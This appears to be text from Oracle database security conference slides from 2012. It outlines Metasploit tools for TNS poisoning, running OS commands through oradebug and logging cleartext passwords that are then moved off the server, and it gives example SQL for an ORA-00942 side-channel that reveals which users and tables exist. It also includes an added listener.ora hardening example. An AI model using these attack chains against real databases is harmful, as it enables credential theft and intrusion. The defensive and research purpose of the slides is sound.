! Presentation of tools for Metasploit to run OS commands, abuse the TNS poisoning bug and get cleartext passwords (server and client).
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password*
! Flaw in the OCI driver
! The password at the client side is stored encrypted (DES) in memory after the logon process has completed.
! Even if the database session is closed the password (and username) stays in memory
! László and Ferenc released a tool for Metasploit to read and decrypt these passwords
! A trojan running on a DBA machine could use this to collect the decrypted passwords
! No workaround/fix is available
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
UNFIXED
Metasploit / Meterpreter Modules
! Metasploit is an open-source security framework. Meterpreter is an advanced payload for Metasploit.
! Metasploit module oradebug: runs OS commands via oradebug call system
! Metasploit module tnspoison: allows to redirect network traffic to pytnsproxy
! PYTNSPROXY: TNS proxy which is used together with the tnspoison Metasploit module
! Meterpreter extension oralog: logs cleartext passwords by hooking into the encryption/decryption routine of the DB server
! Meterpreter extension ocioralog: logs the cleartext password from the OCI driver
Concept
! Metasploit is used to run TNS poisoning and to redirect the TNS traffic to PYTNSPROXY.
! If a SYSDBA connects to the database server, the session can be taken over.
! The oradebug feature is used to inject code into the process space of the database and to hook into the decrypt functions.
! All database passwords are written in cleartext into a text file (contains all passwords, including DB Vault).
! The file with the passwords can be transferred to the attacker's computer.
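The first step of the chain above only works because the listener accepts a dynamic instance registration from an arbitrary host. The listener.ora fragment below is an added defender-side example; it is not part of the slides and not taken from the tools they describe. It shows the listener-side workarounds that stop remote registration. The listener name LISTENER, the host name dbhost.example.com and the address 192.0.2.10 are placeholders; which of the three options is available depends on the release (valid node checking for registration exists in 11.2.0.4 and 12c, COST in older 11.2 releases, static-only registration in all of them).

```text
# listener.ora (added hardening example, not from the original slides)
# Assumes the default listener name LISTENER and a single-instance database.
# On RAC or Data Guard every host whose instances must register remotely has
# to be listed explicitly, otherwise those instances drop out of the listener.

LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example.com)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = LISTENER_IPC))
    )
  )

# Option 1 (11.2.0.4 and 12c): valid node checking for registration.
# ON accepts registrations only from the local machine; the invited-nodes
# list extends that to named hosts. A rogue "instance" on any other host
# cannot claim an existing service name any more.
VALID_NODE_CHECKING_REGISTRATION_LISTENER = ON
REGISTRATION_INVITED_NODES_LISTENER = (dbhost.example.com, 192.0.2.10)

# Option 2 (COST, older 11.2 releases): accept registration only over the
# IPC transport, so only processes on the listener's own machine can
# register. Uncomment instead of option 1 where option 1 is not available.
# SECURE_REGISTER_LISTENER = (IPC)

# Option 3 (all releases): switch dynamic registration off altogether and
# serve only statically configured instances. Needs a matching SID_LIST
# entry per instance, otherwise clients get ORA-12514 for that service.
# DYNAMIC_REGISTRATION_LISTENER = OFF
# SID_LIST_LISTENER =
#   (SID_LIST =
#     (SID_DESC =
#       (GLOBAL_DBNAME = orcl.example.com)
#       (ORACLE_HOME = /u01/app/oracle/product/11.2.0/dbhome_1)
#       (SID_NAME = orcl)
#     )
#   )
```

After editing the file, `lsnrctl reload` picks the parameters up without dropping existing client connections; a registration attempt from a host that is not invited is then refused and shows up in the listener log, which is also the place to watch for repeated refused registrations as a sign that someone is trying the attack.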
Run OS Commands from the web
http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
Side Channel attack on ORA-00942 *
! Martin Berger showed that a side channel attack against Oracle is possible using ORA-00942 *
! The number of recursive calls and the execute count reveal whether an object exists.
* http://berxblog.blogspot.com.au/2012/09/side-channel-attack-on-ora-00942.html
Side Channel attack on ORA-00942: example
select ms.sid, ms.statistic#, sn.name, ms.value
  from v$mystat ms, v$statname sn
 where sn.name in ('recursive calls', 'execute count')
   and ms.statistic# = sn.statistic#
 order by 2;

SQL> select * from a.uztrfghj;
select * from a.uztrfghj
              *
ERROR at line 1:
ORA-00942: table or view does not exist

21 recursive calls
3 execute count

No user ZZZ exists, but a user A exists (but no table A.UZTRFGHJ). There is one more recursive call if the user exists.

SQL> select * from a.m ;
select * from a.m
              *
ERROR at line 1:
ORA-00942: table or view does not exist

26 recursive calls
7 execute count

Now there are even more recursive calls and a higher execute count: the table A.M exists.
October 2012
• Oracle CPU October 2012 *
• Application Security of Core Banking Systems **
* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
** https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm
October 2012 CPU*
• 5 security fixes (1 remotely exploitable)
• Core RDBMS
* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
November 2012
• DOAG 2012
Summary
! Annus horribilis for Oracle (Java, MySQL, Oracle)
! Easy SQL injection bugs in PL/SQL are nearly gone; researchers are looking for more complicated bugs.
! Critical bugs are not fixed; only workarounds are available.
! Nearly all databases (TNS Poisoning) or 11g databases (Stealth Password Cracking) are affected.
Thank you! Contact:
Red-Database-Security GmbH
Bliesstr. 16
D-66538 Neunkirchen
Germany